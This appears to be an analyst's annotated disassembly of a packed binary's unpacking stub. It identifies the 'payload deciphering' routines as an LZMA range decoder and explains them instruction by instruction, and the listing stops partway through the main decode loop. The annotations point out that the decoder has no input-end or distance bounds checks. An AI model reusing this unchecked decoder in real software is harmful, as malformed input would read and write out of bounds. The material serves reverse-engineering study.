seg000:00C11DF0 ; *****************************************************************************
seg000:00C11DF0 ; * PAYLOAD DECIPHERING FUNCTIONS *
seg000:00C11DF0 ; *****************************************************************************
seg000:00C11DF0 ;
seg000:00C11DF0 ; Reviewer notes (analyst's view of the unpacking stub):
seg000:00C11DF0 ;   The four routines below form an adaptive binary range decoder. Their
seg000:00C11DF0 ;   constants (range top 1000000h, 11-bit probabilities out of 800h, initial
seg000:00C11DF0 ;   probability 400h, update shift 5, literal table at word index 1846 = 736h,
seg000:00C11DF0 ;   300h probabilities per literal coder) match the LZMA decoder, so the
seg000:00C11DF0 ;   "deciphering" is most likely plain LZMA decompression of the packed
seg000:00C11DF0 ;   payload -- confirm against a reference LzmaDec before relying on it.
seg000:00C11DF0 ;
seg000:00C11DF0 ;   Decoder context (EDX here, EAX in GetOneSourceByte/ChangeOneWord, ESI in
seg000:00C11DF0 ;   sub_C11EC3), as filled in by the caller at 00C1230E..00C12337:
seg000:00C11DF0 ;     +00h  probability table (16-bit words)
seg000:00C11DF0 ;     +04h  output (dictionary) buffer
seg000:00C11DF0 ;     +08h  current read pointer into the compressed input
seg000:00C11DF0 ;     +0Ch  range   (initialised to 0FFFFFFFFh)
seg000:00C11DF0 ;     +10h  code    (first 4 input bytes, byte-swapped)
seg000:00C11DF0 ;     +14h  output position (bytes written so far)
seg000:00C11DF0 ;     +18h  coder state (0..11), reset here
seg000:00C11DF0 ;     +1Ch  probability count (not read by the routines shown)
seg000:00C11DF0 ;     +20h  scratch: probability being updated by ChangeOneWord
seg000:00C11DF0 ;     +24h  lc, +28h lp, +2Ch pb (from the properties byte, 00C122C0..00C122DF)
seg000:00C11DF0 ;
seg000:00C11DF0 ;   None of these routines checks the end of the compressed input, and the
seg000:00C11DF0 ;   copy loops never check that a match distance stays inside the output
seg000:00C11DF0 ;   buffer: termination comes only from the output size or the end marker.
seg000:00C11DF0 ;   A re-implementation used on untrusted samples needs those bounds checks.
seg000:00C11DF0
seg000:00C11DF0 ; =============== S U B R O U T I N E =======================================
seg000:00C11DF0
seg000:00C11DF0 ; fill_with_0x400(EDX = decoder context)
seg000:00C11DF0 ;   Sets every probability word to 400h (= 800h/2, "one half") and resets
seg000:00C11DF0 ;   the coder state [EDX+18h] to 0.
seg000:00C11DF0 ;   Table size = 2*(300h << (lc+lp)) + 0E6Ch bytes, i.e. 1846 + (300h << (lc+lp)) words.
seg000:00C11DF0 ;   Clobbers: EAX, ECX, flags. ESI preserved. No stack arguments.
seg000:00C11DF0
seg000:00C11DF0 fill_with_0x400 proc near              ; CODE XREF: seg000:00C1231A
seg000:00C11DF0         mov     ecx, [edx+28h]          ; ECX = lp
seg000:00C11DF3         add     ecx, [edx+24h]          ; ECX = lp + lc (only CL feeds the shift)
seg000:00C11DF6         mov     eax, [edx]              ; EAX = start of the probability table
seg000:00C11DF8         push    esi                     ; save callee-saved ESI
seg000:00C11DF9         mov     esi, 300h               ; 300h words per literal coder
seg000:00C11DFE         shl     esi, cl                 ; ESI = 300h << (lc+lp) = literal probability count
seg000:00C11E00         lea     ecx, [eax+esi*2+0E6Ch]  ; ECX = table end = base + 2*ESI + 2*1846
seg000:00C11E07
seg000:00C11E07 loc_C11E07:                             ; CODE XREF: fill_with_0x400+24
seg000:00C11E07         mov     esi, 400h               ; fill value (probability 1/2)
seg000:00C11E0C         mov     [eax], si               ; *p = 400h (one 16-bit word)
seg000:00C11E0F         add     eax, 2                  ; p++
seg000:00C11E12         cmp     eax, ecx
seg000:00C11E14         jb      short loc_C11E07        ; unsigned: loop until p reaches the end
seg000:00C11E16         and     dword ptr [edx+18h], 0  ; state = 0
seg000:00C11E1A         pop     esi
seg000:00C11E1B         retn
seg000:00C11E1B fill_with_0x400 endp
seg000:00C11E1B
seg000:00C11E1C ; ============================================================
seg000:00C11E1C ; GetOneSourceByte(EAX = decoder context) -- range-coder normalisation
seg000:00C11E1C ;
seg000:00C11E1C ; INPUT :
seg000:00C11E1C ;   [EAX+8]   = current read pointer into the compressed input
seg000:00C11E1C ;   [EAX+0Ch] = range
seg000:00C11E1C ;   [EAX+10h] = code
seg000:00C11E1C ;
seg000:00C11E1C ; OUTPUT :
seg000:00C11E1C ;   [EAX+8]   = not modified, or incremented by 1
seg000:00C11E1C ;   [EAX+0Ch] = not modified, or range << 8
seg000:00C11E1C ;   [EAX+10h] = not modified, or (code << 8) | one input byte
seg000:00C11E1C ;
seg000:00C11E1C ; if ( range < 0x1000000 )
seg000:00C11E1C ; {
seg000:00C11E1C ;     range = range << 8;
seg000:00C11E1C ;     code  = (code << 8 & 0xFFFFFF00) + *((unsigned char *) ptr);
seg000:00C11E1C ;     ptr ++;
seg000:00C11E1C ; }
seg000:00C11E1C ;
seg000:00C11E1C ; Clobbers: ECX, DL, flags. No return value.
seg000:00C11E1C ; NOTE: no end-of-input check -- a truncated stream makes this read past
seg000:00C11E1C ;       the compressed buffer.
seg000:00C11E1C
seg000:00C11E1C ; =============== S U B R O U T I N E =======================================
seg000:00C11E1C
seg000:00C11E1C
seg000:00C11E1C GetOneSourceByte proc near             ; CODE XREF: ChangeOneWord+D
seg000:00C11E1C                                         ; sub_C11EC3+307 ...
seg000:00C11E1C         mov     ecx, [eax+0Ch]          ; ECX = range
seg000:00C11E1F         cmp     ecx, 1000000h
seg000:00C11E25         jnb     short locret_C11E3D     ; range >= 2^24: nothing to do
seg000:00C11E27 ;
seg000:00C11E27         shl     dword ptr [eax+10h], 8  ; code <<= 8 (low byte is now 0)
seg000:00C11E2B         shl     ecx, 8
seg000:00C11E2E         mov     [eax+0Ch], ecx          ; range <<= 8
seg000:00C11E31         mov     ecx, [eax+8]            ; ECX = input pointer
seg000:00C11E34         mov     dl, [ecx]               ; DL = next compressed byte
seg000:00C11E36         inc     ecx                     ; ptr++
seg000:00C11E37         mov     [eax+10h], dl           ; low byte of code = that byte
seg000:00C11E3A         mov     [eax+8], ecx            ; store the advanced pointer
seg000:00C11E3D
seg000:00C11E3D locret_C11E3D:                          ; CODE XREF: GetOneSourceByte+9
seg000:00C11E3D         retn
seg000:00C11E3D GetOneSourceByte endp
seg000:00C11E3D
seg000:00C11E3E ;***************************************************************
seg000:00C11E3E ; ChangeOneWord(EAX = decoder context, arg_0 = address of a probability word)
seg000:00C11E3E ;   Decodes ONE bit with the adaptive probability prob = *arg_0, then
seg000:00C11E3E ;   updates that probability in place (one of two update formulas,
seg000:00C11E3E ;   depending on the decoded bit).
seg000:00C11E3E ;
seg000:00C11E3E ; INPUT :
seg000:00C11E3E ;   arg_0 ([ESP+4] on entry, [ESP+8] after the push ebx) = address of the
seg000:00C11E3E ;           16-bit probability word to read and update
seg000:00C11E3E ;   [EAX+8]   = input pointer (advanced via GetOneSourceByte)
seg000:00C11E3E ;   [EAX+0Ch] = range
seg000:00C11E3E ;   [EAX+10h] = code
seg000:00C11E3E ;
seg000:00C11E3E ; OUTPUT :
seg000:00C11E3E ;   [EAX+20h] = prob value before the update (scratch)
seg000:00C11E3E ;   bound = (range >> 11) * prob
seg000:00C11E3E ;   if code <  bound : range  = bound;  prob += (800h - prob) >> 5;  EAX = 0
seg000:00C11E3E ;   else             : range -= bound;  code -= bound;
seg000:00C11E3E ;                      prob -= prob >> 5;                           EAX = 1
seg000:00C11E3E ;
seg000:00C11E3E ; RETURN :
seg000:00C11E3E ;   EAX = decoded bit (0 or 1). `retn 4` pops the one argument.
seg000:00C11E3E ; Clobbers: ECX, EDX, flags. EBX, ESI, EDI preserved.
seg000:00C11E3E
seg000:00C11E3E ; =============== S U B R O U T I N E =======================================
seg000:00C11E3E
seg000:00C11E3E
seg000:00C11E3E ChangeOneWord proc near                ; CODE XREF: sub_C11E9C+12
seg000:00C11E3E                                         ; sub_C11EC3+42 ...
seg000:00C11E3E
seg000:00C11E3E arg_0 = dword ptr  4
seg000:00C11E3E
seg000:00C11E3E         push    ebx                     ; save callee-saved EBX
seg000:00C11E3F         mov     ebx, [esp+4+arg_0]      ; EBX = address of the probability word (0xFAA000 on the first call traced)
seg000:00C11E43         movzx   ecx, word ptr [ebx]     ; ECX = prob, zero-extended from 16 bits
seg000:00C11E46         push    esi                     ; save callee-saved ESI
seg000:00C11E47         push    edi                     ; save callee-saved EDI
seg000:00C11E48         mov     [eax+20h], ecx          ; stash prob in the context
seg000:00C11E4B         call    GetOneSourceByte        ; normalise: pull in a byte if range < 2^24
seg000:00C11E50         mov     ecx, [eax+0Ch]          ; ECX = range
seg000:00C11E53         mov     edi, [eax+20h]          ; EDI = prob
seg000:00C11E56         mov     esi, [eax+10h]          ; ESI = code
seg000:00C11E59         mov     edx, ecx
seg000:00C11E5B         shr     edx, 0Bh                ; range >> 11
seg000:00C11E5E         imul    edx, edi                ; EDX = bound = (range >> 11) * prob
seg000:00C11E61         cmp     esi, edx
seg000:00C11E63         jnb     short loc_C11E7C        ; unsigned: code >= bound -> bit 1
seg000:00C11E65 ;
seg000:00C11E65         mov     ecx, 800h
seg000:00C11E6A         sub     ecx, edi                ; ECX = 800h - prob
seg000:00C11E6C         shr     ecx, 5                  ; ECX = (800h - prob) >> 5
seg000:00C11E6F         add     cx, di                  ; CX = prob + ((800h - prob) >> 5)  (16-bit add; upper half of ECX is dead)
seg000:00C11E72         mov     [eax+0Ch], edx          ; range = bound
seg000:00C11E75         mov     [ebx], cx               ; !!! write the updated probability back (moves towards 800h) !!!
seg000:00C11E78         xor     eax, eax                ; return bit 0
seg000:00C11E7A         jmp     short loc_C11E96
seg000:00C11E7C ; ---------------------------------------------------------------------------
seg000:00C11E7C
seg000:00C11E7C loc_C11E7C:                             ; CODE XREF: ChangeOneWord+25
seg000:00C11E7C         sub     ecx, edx
seg000:00C11E7E         mov     [eax+0Ch], ecx          ; range -= bound
seg000:00C11E81         sub     esi, edx
seg000:00C11E83         mov     [eax+10h], esi          ; code -= bound
seg000:00C11E86         mov     ax, [eax+20h]           ; AX = prob (low half of the context pointer is clobbered; EAX is rebuilt below)
seg000:00C11E8A         shr     edi, 5                  ; EDI = prob >> 5
seg000:00C11E8D         sub     ax, di                  ; AX = prob - (prob >> 5)
seg000:00C11E90         mov     [ebx], ax               ; !!! write the updated probability back (moves towards 0) !!!
seg000:00C11E93         xor     eax, eax
seg000:00C11E95         inc     eax                     ; return bit 1
seg000:00C11E96
seg000:00C11E96 loc_C11E96:                             ; CODE XREF: ChangeOneWord+3C
seg000:00C11E96         pop     edi
seg000:00C11E97         pop     esi
seg000:00C11E98         pop     ebx
seg000:00C11E99         retn    4                       ; callee pops the one dword argument
seg000:00C11E99 ChangeOneWord endp
seg000:00C11E99
seg000:00C11E9C
seg000:00C11E9C ; =============== S U B R O U T I N E =======================================
seg000:00C11E9C
seg000:00C11E9C ; sub_C11E9C(ctx, probs, limit) -- bit-tree decode, most significant bit first
seg000:00C11E9C ;   arg_0 = decoder context (passed to ChangeOneWord in EAX)
seg000:00C11E9C ;   arg_4 = base address of the probability sub-table (16-bit words)
seg000:00C11E9C ;   arg_8 = limit = 1 << number_of_bits (8, 40h or 100h in the callers seen)
seg000:00C11E9C ;   i = 1;  do { i = 2*i + bit(probs[i]); } while (i < limit);  return i - limit;
seg000:00C11E9C ; RETURN : EAX = decoded symbol in 0..limit-1. `retn 0Ch` pops the 3 arguments.
seg000:00C11E9C ; Clobbers: ECX, EDX, flags. ESI preserved.
seg000:00C11E9C
seg000:00C11E9C sub_C11E9C proc near                   ; CODE XREF: sub_C11EC3+26B
seg000:00C11E9C                                         ; sub_C11EC3+29E
seg000:00C11E9C
seg000:00C11E9C arg_0 = dword ptr  4
seg000:00C11E9C arg_4 = dword ptr  8
seg000:00C11E9C arg_8 = dword ptr  0Ch
seg000:00C11E9C
seg000:00C11E9C         xor     eax, eax
seg000:00C11E9E         inc     eax                     ; i = 1
seg000:00C11E9F         push    esi                     ; save callee-saved ESI (the +4 in the arg offsets below)
seg000:00C11EA0
seg000:00C11EA0 loc_C11EA0:                             ; CODE XREF: sub_C11E9C+1D
seg000:00C11EA0         lea     esi, [eax+eax]          ; ESI = 2*i = byte offset of probs[i]
seg000:00C11EA3         mov     eax, [esp+4+arg_4]
seg000:00C11EA7         add     eax, esi                ; EAX = &probs[i]
seg000:00C11EA9         push    eax                     ; argument for ChangeOneWord
seg000:00C11EAA         mov     eax, [esp+8+arg_0]      ; EAX = context (+8: saved ESI and the pushed argument)
seg000:00C11EAE         call    ChangeOneWord           ; EAX = bit (argument popped by the callee)
seg000:00C11EB3         add     eax, esi                ; i = 2*i + bit
seg000:00C11EB5         cmp     eax, [esp+4+arg_8]
seg000:00C11EB9         jb      short loc_C11EA0        ; unsigned: continue while i < limit
seg000:00C11EBB ;
seg000:00C11EBB         sub     eax, [esp+4+arg_8]      ; strip the leading 1: symbol = i - limit
seg000:00C11EBF         pop     esi
seg000:00C11EC0         retn    0Ch
seg000:00C11EC0 sub_C11E9C endp
seg000:00C11EC0
seg000:00C11EC3 ; *********************************************************************
seg000:00C11EC3 ; Entry :
seg000:00C11EC3 ; EBP+8 = 0x2134D3   (arg_0: size of the decompressed output, see nextBlock)
seg000:00C11EC3 ;
seg000:00C11EC3 ; ESI = decoder context
seg000:00C11EC3 ; [ESI+4] = 0xD90000 => Destination block address. [ESI+4] is never modified !
seg000:00C11EC3 ; [ESI+14h] = writing offset in destination block.
seg000:00C11EC3 ; [ESI+18h] = coder state (0..11), reset to 0 by fill_with_0x400
seg000:00C11EC3 ; [ESI+24h] = lc (literal context bits)
seg000:00C11EC3 ; [ESI+28h] = lp (literal position bits)
seg000:00C11EC3 ; [ESI+2Ch] = pb (position bits)
seg000:00C11EC3 ; also used: [ESI] probability table, [ESI+8]/[ESI+0Ch]/[ESI+10h] range coder
seg000:00C11EC3 ;            (input pointer / range / code, handled by ChangeOneWord)
seg000:00C11EC3 ;
seg000:00C11EC3 ; Main decode loop: one literal or one match per iteration until the output
seg000:00C11EC3 ; position reaches arg_0 or the end marker (distance 0FFFFFFFFh) is seen.
seg000:00C11EC3 ; The sub-table offsets and state transitions below match the LZMA SDK
seg000:00C11EC3 ; decoder (offsets doubled because entries are 16-bit) -- presumably LZMA,
seg000:00C11EC3 ; confirm against a reference implementation.
seg000:00C11EC3 ;
seg000:00C11EC3 ; Locals :
seg000:00C11EC3 ;   var_28..var_1C = rep0..rep3 (last four match distances, initialised to 1)
seg000:00C11EC3 ;   var_18 = posState mask (1<<pb)-1   var_10 = literal position mask (1<<lp)-1
seg000:00C11EC3 ;   var_4  = literal symbol / match length   var_8, var_C, var_14 = loop scratch
seg000:00C11EC3 ; Probability sub-tables (byte offsets from [ESI], 2 bytes per entry) :
seg000:00C11EC3 ;   0 IsMatch[state][posState], 180h IsRep, 198h IsRepG0, 1B0h IsRepG1,
seg000:00C11EC3 ;   1C8h IsRepG2, 1E0h IsRep0Long, 360h PosSlot, 55Eh SpecPos-1, 644h Align,
seg000:00C11EC3 ;   664h LenCoder, 0A68h RepLenCoder, 0E6Ch Literal
seg000:00C11EC3 ;
seg000:00C11EC3 ; RETURN : EAX = 0 always (no error reporting). `retn 4` pops arg_0.
seg000:00C11EC3 ; The decoder trusts the stream: there is no input-end check and no check
seg000:00C11EC3 ; that rep0 <= output position, so a malformed stream reads outside the
seg000:00C11EC3 ; buffers. Acceptable only because the stub decodes its own embedded data.
seg000:00C11EC3
seg000:00C11EC3 ; =============== S U B R O U T I N E =======================================
seg000:00C11EC3
seg000:00C11EC3 ; Attributes: bp-based frame
seg000:00C11EC3
seg000:00C11EC3 sub_C11EC3 proc near                   ; CODE XREF: seg000:00C1233A
seg000:00C11EC3
seg000:00C11EC3 var_28 = dword ptr -28h
seg000:00C11EC3 var_24 = dword ptr -24h
seg000:00C11EC3 var_20 = dword ptr -20h
seg000:00C11EC3 var_1C = dword ptr -1Ch
seg000:00C11EC3 var_18 = dword ptr -18h
seg000:00C11EC3 var_14 = dword ptr -14h
seg000:00C11EC3 var_10 = dword ptr -10h
seg000:00C11EC3 var_C = dword ptr -0Ch
seg000:00C11EC3 var_8 = dword ptr -8
seg000:00C11EC3 var_4 = dword ptr -4
seg000:00C11EC3 arg_0 = dword ptr  8
seg000:00C11EC3
seg000:00C11EC3         push    ebp                     ; EBP=0x12FFAC (values from the analyst's trace)
seg000:00C11EC4         mov     ebp, esp                ; EBP=0x12FF50
seg000:00C11EC6         sub     esp, 28h                ; ESP=0x12FF28 ; ten dword locals
seg000:00C11EC9         mov     ecx, [esi+2Ch]          ; CL = pb (=1 in the trace)
seg000:00C11ECC         push    ebx                     ; EBX=0xD90000 ; save callee-saved
seg000:00C11ECD         push    edi                     ; EDI=0x18736 ; save callee-saved
seg000:00C11ECE         xor     edi, edi
seg000:00C11ED0         inc     edi                     ; EDI=1 ; loop invariant: EDI == 1 whenever loc_C11EF0 is reached
seg000:00C11ED1         mov     edx, edi                ; EDX=1
seg000:00C11ED3         shl     edx, cl                 ; EDX = 1 << pb
seg000:00C11ED5         mov     ecx, [esi+28h]          ; CL = lp (=0 in the trace)
seg000:00C11ED8         mov     eax, edi                ; EAX=1
seg000:00C11EDA         shl     eax, cl                 ; EAX = 1 << lp
seg000:00C11EDC         dec     edx                     ; EDX = posState mask
seg000:00C11EDD         mov     [ebp+var_28], edi       ; rep0 = 1
seg000:00C11EE0         mov     [ebp+var_24], edi       ; rep1 = 1
seg000:00C11EE3         dec     eax                     ; EAX = literal position mask
seg000:00C11EE4         mov     [ebp+var_20], edi       ; rep2 = 1
seg000:00C11EE7         mov     [ebp+var_1C], edi       ; rep3 = 1
seg000:00C11EEA         mov     [ebp+var_18], edx       ; posState mask (reloaded into EDX at nextBlock)
seg000:00C11EED         mov     [ebp+var_10], eax       ; literal position mask
seg000:00C11EF0
seg000:00C11EF0 loc_C11EF0:                             ; CODE XREF: sub_C11EC3+3CB
seg000:00C11EF0                                         ; --- main loop: EDX = posState mask, EDI = 1 ---
seg000:00C11EF0         mov     ebx, [esi+14h]          ; EBX = output position
seg000:00C11EF3         mov     eax, [esi+18h]          ; EAX = state
seg000:00C11EF6         mov     ecx, [esi]              ; ECX = probability table
seg000:00C11EF8         shl     eax, 4                  ; state * 16 (max 16 posStates)
seg000:00C11EFB         and     ebx, edx                ; EBX = posState = pos & mask
seg000:00C11EFD         add     eax, ebx
seg000:00C11EFF         lea     eax, [ecx+eax*2]        ; EAX = &IsMatch[state][posState]
seg000:00C11F02         push    eax                     ; argument for ChangeOneWord
seg000:00C11F03         mov     eax, esi
seg000:00C11F05         call    ChangeOneWord
seg000:00C11F0A         test    eax, eax
seg000:00C11F0C         jnz     EAX_1a                  ; bit 1 -> match, bit 0 -> literal
seg000:00C11F12         mov     ebx, [esi]              ; EBX = probability table
seg000:00C11F14         mov     [ebp+var_4], edi        ; symbol = 1 (EDI == 1 here)
seg000:00C11F17         mov     edi, [esi+14h]          ; EDI = pos
seg000:00C11F1A         add     ebx, 0E6Ch              ; EBX = Literal table
seg000:00C11F20         test    edi, edi
seg000:00C11F22         jz      short loc_C11F4F        ; first byte: no previous byte, coder 0
seg000:00C11F24         mov     ecx, [esi+4]
seg000:00C11F27         movzx   edx, byte ptr [ecx+edi-1] ; EDX = previous output byte
seg000:00C11F2C         mov     eax, [esi+24h]          ; EAX = lc
seg000:00C11F2F         push    8
seg000:00C11F31         pop     ecx
seg000:00C11F32         sub     cl, al                  ; CL = 8 - lc
seg000:00C11F34         shr     edx, cl                 ; EDX = prev >> (8 - lc)
seg000:00C11F36         mov     ecx, edi
seg000:00C11F38         and     ecx, [ebp+var_10]       ; pos & lpMask
seg000:00C11F3B         mov     [ebp+var_C], ecx
seg000:00C11F3E         mov     ecx, eax                ; CL = lc
seg000:00C11F40         mov     eax, [ebp+var_C]
seg000:00C11F43         shl     eax, cl                 ; (pos & lpMask) << lc
seg000:00C11F45         add     edx, eax                ; EDX = literal coder index
seg000:00C11F47         imul    edx, 600h               ; * 300h words * 2 bytes
seg000:00C11F4D         add     ebx, edx                ; EBX = this literal coder's 300h probabilities
seg000:00C11F4F
seg000:00C11F4F loc_C11F4F:                             ; CODE XREF: sub_C11EC3+5F
seg000:00C11F4F         mov     eax, [esi+18h]          ; state update for a literal
seg000:00C11F52         cmp     eax, 7
seg000:00C11F55         jnb     short loc_C11F86        ; state >= 7: previous symbol was a match -> "matched literal"
seg000:00C11F57         cmp     eax, 4
seg000:00C11F5A         jnb     short loc_C11F60
seg000:00C11F5C         mov     ecx, eax                ; state < 4 -> new state 0
seg000:00C11F5E         jmp     short loc_C11F63
seg000:00C11F60 ; ---------------------------------------------------------------------------
seg000:00C11F60
seg000:00C11F60 loc_C11F60:                             ; CODE XREF: sub_C11EC3+97
seg000:00C11F60         push    3
seg000:00C11F62         pop     ecx                     ; state 4..6 -> state - 3
seg000:00C11F63
seg000:00C11F63 loc_C11F63:                             ; CODE XREF: sub_C11EC3+9B
seg000:00C11F63         sub     eax, ecx
seg000:00C11F65         mov     [esi+18h], eax
seg000:00C11F68
seg000:00C11F68 loc_C11F68:                             ; CODE XREF: sub_C11EC3+BF
seg000:00C11F68                                         ; plain literal: 8 bit-tree steps
seg000:00C11F68         mov     edi, [ebp+var_4]
seg000:00C11F6B         add     edi, edi                ; EDI = 2 * symbol
seg000:00C11F6D         lea     eax, [edi+ebx]          ; EAX = &probs[symbol]  (a probability word, not an input byte)
seg000:00C11F70         push    eax
seg000:00C11F71         mov     eax, esi
seg000:00C11F73         call    ChangeOneWord
seg000:00C11F78         add     eax, edi                ; symbol = 2*symbol + bit
seg000:00C11F7A         mov     [ebp+var_4], eax
seg000:00C11F7D         cmp     eax, 100h
seg000:00C11F82         jb      short loc_C11F68        ; until 8 bits are in (symbol >= 100h)
seg000:00C11F84         jmp     short loc_C11FE0
seg000:00C11F86 ; ---------------------------------------------------------------------------
seg000:00C11F86
seg000:00C11F86 loc_C11F86:                             ; CODE XREF: sub_C11EC3+92
seg000:00C11F86                                         ; matched literal: byte at pos-rep0 predicts the bits
seg000:00C11F86         mov     ecx, [esi+4]
seg000:00C11F89         sub     ecx, [ebp+var_28]       ; ECX = dict - rep0 (no check that rep0 <= pos)
seg000:00C11F8C         cmp     eax, 0Ah                ; CF for the state update below (movzx/mov keep flags)
seg000:00C11F8F         movzx   ecx, byte ptr [ecx+edi] ; matchByte = dict[pos - rep0]
seg000:00C11F93         mov     [ebp+var_C], ecx
seg000:00C11F96         sbb     ecx, ecx
seg000:00C11F98         and     ecx, 0FFFFFFFDh
seg000:00C11F9B         add     ecx, 6                  ; ECX = (state < 10) ? 3 : 6
seg000:00C11F9E         sub     eax, ecx                ; state -= 3 or 6
seg000:00C11FA0         mov     [ebp+var_8], 100h       ; offs = 100h
seg000:00C11FA7         mov     [esi+18h], eax
seg000:00C11FAA
seg000:00C11FAA loc_C11FAA:                             ; CODE XREF: sub_C11EC3+11B
seg000:00C11FAA         mov     eax, [ebp+var_8]        ; EAX = offs
seg000:00C11FAD         shl     [ebp+var_C], 1          ; matchByte <<= 1
seg000:00C11FB0         mov     edi, eax
seg000:00C11FB2         and     edi, [ebp+var_C]        ; EDI = bit = matchByte & offs
seg000:00C11FB5         add     eax, edi
seg000:00C11FB7         add     eax, [ebp+var_4]        ; offs + bit + symbol
seg000:00C11FBA         lea     eax, [ebx+eax*2]        ; EAX = &probs[offs + bit + symbol]
seg000:00C11FBD         push    eax
seg000:00C11FBE         mov     eax, esi
seg000:00C11FC0         call    ChangeOneWord
seg000:00C11FC5         mov     ecx, [ebp+var_4]
seg000:00C11FC8         lea     ecx, [eax+ecx*2]        ; symbol = 2*symbol + decoded bit
seg000:00C11FCB         mov     [ebp+var_4], ecx
seg000:00C11FCE         test    eax, eax
seg000:00C11FD0         jnz     short loc_C11FD4        ; decoded 1: offs &= bit
seg000:00C11FD2         not     edi                     ; decoded 0: offs &= ~bit
seg000:00C11FD4
seg000:00C11FD4 loc_C11FD4:                             ; CODE XREF: sub_C11EC3+10D
seg000:00C11FD4         and     [ebp+var_8], edi
seg000:00C11FD7         cmp     [ebp+var_4], 100h
seg000:00C11FDE         jb      short loc_C11FAA        ; until 8 bits are in
seg000:00C11FE0
seg000:00C11FE0 loc_C11FE0:                             ; CODE XREF: sub_C11EC3+C1
seg000:00C11FE0         mov     eax, [esi+14h]          ; EAX = pos
seg000:00C11FE3         mov     ecx, [esi+4]            ; ECX = dict
seg000:00C11FE6         mov     dl, byte ptr [ebp+var_4] ; DL = low 8 bits of the symbol
seg000:00C11FE9         mov     [eax+ecx], dl           ; <=============== dict[pos] = literal byte !
seg000:00C11FEC         inc     eax
seg000:00C11FED         mov     [esi+14h], eax          ; pos++
seg000:00C11FF0         jmp     loc_C12280
seg000:00C11FF5 ; ---------------------------------------------------------------------------
seg000:00C11FF5
seg000:00C11FF5 EAX_1a:                                 ; CODE XREF: sub_C11EC3+49
seg000:00C11FF5                                         ; --- match ---
seg000:00C11FF5         mov     eax, [esi+18h]
seg000:00C11FF8         mov     ecx, [esi]
seg000:00C11FFA         lea     eax, [ecx+eax*2+180h]   ; EAX = &IsRep[state]
seg000:00C12001         push    eax
seg000:00C12002         mov     eax, esi
seg000:00C12004         call    ChangeOneWord
seg000:00C12009         test    eax, eax
seg000:00C1200B         jnz     short loc_C1201E        ; 1 -> repeated distance
seg000:00C1200D         mov     edi, [esi]              ; simple match with a new distance
seg000:00C1200F         add     dword ptr [esi+18h], 0Ch ; state += 12 (marks "distance follows"; undone at loc_C1222D)
seg000:00C12013         add     edi, 664h               ; EDI = LenCoder
seg000:00C12019         jmp     loc_C120DF
seg000:00C1201E ; ---------------------------------------------------------------------------
seg000:00C1201E
seg000:00C1201E loc_C1201E:                             ; CODE XREF: sub_C11EC3+148
seg000:00C1201E         mov     eax, [esi+18h]
seg000:00C12021         mov     ecx, [esi]
seg000:00C12023         lea     eax, [ecx+eax*2+198h]   ; EAX = &IsRepG0[state]
seg000:00C1202A         push    eax
seg000:00C1202B         mov     eax, esi
seg000:00C1202D         call    ChangeOneWord
seg000:00C12032         mov     ecx, [esi]
seg000:00C12034         test    eax, eax
seg000:00C12036         mov     eax, [esi+18h]
seg000:00C12039         jnz     short EAX_1b            ; 1 -> rep1..rep3
seg000:00C1203B         add     eax, 0Fh
seg000:00C1203E         shl     eax, 4                  ; (state + 15) * 16 = 240 + state*16
seg000:00C12041         add     eax, ebx                ; + posState
seg000:00C12043         lea     eax, [ecx+eax*2]        ; EAX = &IsRep0Long[state][posState]
seg000:00C12046         push    eax
seg000:00C12047         mov     eax, esi
seg000:00C12049         call    ChangeOneWord
seg000:00C1204E         test    eax, eax
seg000:00C12050         jnz     short loc_C120C8        ; 1 -> rep0 with a coded length
seg000:00C12052         mov     eax, [esi+14h]          ; "short rep": copy one byte from distance rep0
seg000:00C12055         mov     ecx, [esi+4]
seg000:00C12058         add     ecx, eax                ; ECX = &dict[pos]
seg000:00C1205A         mov     edx, ecx
seg000:00C1205C         sub     edx, [ebp+var_28]       ; EDX = &dict[pos - rep0] (no check that rep0 <= pos)
seg000:00C1205F         inc     eax
seg000:00C12060         cmp     dword ptr [esi+18h], 7  ; CF for the state update
seg000:00C12064         mov     dl, [edx]
seg000:00C12066         mov     [esi+14h], eax          ; pos++
seg000:00C12069         sbb     eax, eax
seg000:00C1206B         and     eax, 0FFFFFFFEh
seg000:00C1206E         add     eax, 0Bh                ; state = (state < 7) ? 9 : 11
seg000:00C12071         mov     [ecx], dl               ; dict[pos] = dict[pos - rep0]
seg000:00C12073         mov     [esi+18h], eax
seg000:00C12076         jmp     nextBlock               ; EDI is still 1 here, so loc_C12280 can be skipped
seg000:00C1207B ; ---------------------------------------------------------------------------
seg000:00C1207B
seg000:00C1207B EAX_1b:                                 ; CODE XREF: sub_C11EC3+176
seg000:00C1207B         lea     eax, [ecx+eax*2+1B0h]   ; EAX = &IsRepG1[state]
seg000:00C12082         push    eax
seg000:00C12083         mov     eax, esi
seg000:00C12085         call    ChangeOneWord
seg000:00C1208A         test    eax, eax
seg000:00C1208C         jnz     short EAX_1c
seg000:00C1208E         mov     eax, [ebp+var_24]       ; use rep1
seg000:00C12091         jmp     short loc_C120BF
seg000:00C12093 ; ---------------------------------------------------------------------------
seg000:00C12093
seg000:00C12093 EAX_1c:                                 ; CODE XREF: sub_C11EC3+1C9
seg000:00C12093         mov     eax, [esi+18h]
seg000:00C12096         mov     ecx, [esi]
seg000:00C12098         lea     eax, [ecx+eax*2+1C8h]   ; EAX = &IsRepG2[state]
seg000:00C1209F         push    eax
seg000:00C120A0         mov     eax, esi
seg000:00C120A2         call    ChangeOneWord
seg000:00C120A7         test    eax, eax
seg000:00C120A9         jnz     short EAX_1d
seg000:00C120AB         mov     eax, [ebp+var_20]       ; use rep2
seg000:00C120AE         jmp     short loc_C120B9
seg000:00C120B0 ; ---------------------------------------------------------------------------
seg000:00C120B0
seg000:00C120B0 EAX_1d:                                 ; CODE XREF: sub_C11EC3+1E6
seg000:00C120B0         mov     ecx, [ebp+var_20]       ; use rep3
seg000:00C120B3         mov     eax, [ebp+var_1C]
seg000:00C120B6         mov     [ebp+var_1C], ecx       ; rep3 = rep2
seg000:00C120B9
seg000:00C120B9 loc_C120B9:                             ; CODE XREF: sub_C11EC3+1EB
seg000:00C120B9         mov     ecx, [ebp+var_24]
seg000:00C120BC         mov     [ebp+var_20], ecx       ; rep2 = rep1
seg000:00C120BF
seg000:00C120BF loc_C120BF:                             ; CODE XREF: sub_C11EC3+1CE
seg000:00C120BF         mov     ecx, [ebp+var_28]
seg000:00C120C2         mov     [ebp+var_24], ecx       ; rep1 = rep0
seg000:00C120C5         mov     [ebp+var_28], eax       ; rep0 = selected distance
seg000:00C120C8
seg000:00C120C8 loc_C120C8:                             ; CODE XREF: sub_C11EC3+18D
seg000:00C120C8         cmp     dword ptr [esi+18h], 7  ; CF for the state update
